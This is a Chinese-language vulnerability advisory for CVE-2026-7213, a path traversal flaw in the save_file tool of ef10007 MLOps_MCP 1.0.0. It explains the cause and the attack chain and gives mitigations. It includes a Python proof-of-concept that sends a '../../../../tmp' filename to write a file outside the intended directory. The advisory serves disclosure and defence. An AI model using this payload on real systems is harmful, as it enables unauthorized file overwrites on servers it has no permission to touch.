CVE-2026-7213 CVSS 7.3 高危

CVE-2026-7213 ef10007 MLOps_MCP路径遍历漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7213

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ef10007 MLOps_MCP

漏洞概述

该漏洞存在于 ef10007 MLOps_MCP 1.0.0 版本中，具体位于 `fastmcp_server.py` 组件的 `save_file` 工具。由于程序未对文件名参数进行有效过滤，攻击者可通过操控 `filename` 或 `destination` 参数实施路径遍历攻击。该漏洞允许远程无认证攻击者利用，且公开的利用代码已存在，鉴于厂商尚未响应，该漏洞对系统安全构成严重威胁。

技术细节

该漏洞的技术根源在于 `fastmcp_server.py` 中 `save_file` 函数对用户输入参数处理不当。在处理文件保存请求时，应用程序直接使用了用户提供的 `filename` 或 `destination` 参数来构建文件系统路径，而未进行任何规范化或安全检查。这意味着攻击者可以注入包含目录遍历序列（如 `../` 或 `..\`）的字符串，绕过预期的保存目录限制，将文件写入服务器的任意位置。根据 CVSS 3.1 评分向量（AV:N/AC:L/PR:N/UI:N），攻击者无需用户交互且无需身份认证即可通过网络发起攻击。成功利用该漏洞可能导致敏感信息泄露（C:L）、数据篡改（I:L）或服务中断（A:L）。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找开放 ef10007 MLOps_MCP 服务（默认端口或特定路径）的目标主机。

STEP 2

武器化

攻击者构造包含路径遍历字符（如 ../）的恶意载荷，意图将文件写入非预期目录（如系统根目录或配置文件目录）。

STEP 3

投递

攻击者向目标服务器的 `save_file` 接口发送 HTTP POST 请求，请求体中包含篡改后的 `filename` 或 `destination` 参数。

STEP 4

利用

服务器端 `fastmcp_server.py` 接收请求，未对文件名进行过滤直接拼接路径，导致文件被写入攻击者指定的任意位置。

STEP 5

达成目标

攻击者成功覆盖关键文件或写入恶意脚本，导致系统机密性、完整性或可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Exploit Title: ef10007 MLOps_MCP 1.0.0 Path Traversal
# Description: Exploits the save_file tool to write files outside the intended directory.

TARGET_URL = "http://target-host:port/api/save_file"

def exploit():
    # Malicious filename using path traversal
    payload = {
        "filename": "../../../../tmp/poc_exploit.txt",
        "content": "CVE-2026-7213 Path Traversal PoC"
    }

    headers = {
        "Content-Type": "application/json"
    }

    try:
        response = requests.post(TARGET_URL, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful! File likely written.")
        else:
            print(f"[-] Exploit failed. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

ef10007 MLOps_MCP 1.0.0

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议暂时禁用 `save_file` 功能或从网络层隔离受影响的服务。通过防火墙规则限制仅允许可信 IP 地址访问该服务。同时，应密切监控服务器日志，检查是否存在异常的文件写入行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7213
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7213
3 Details https://www.cvedetails.com/cve/CVE-2026-7213/
4 VulDB https://vuldb.com/cve/CVE-2026-7213
5 Link https://github.com/ef10007/MLOps_MCP/
6 Link https://github.com/ef10007/MLOps_MCP/issues/1
7 Link https://vuldb.com/submit/802085
8 Link https://vuldb.com/vuln/359809
9 Link https://vuldb.com/vuln/359809/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表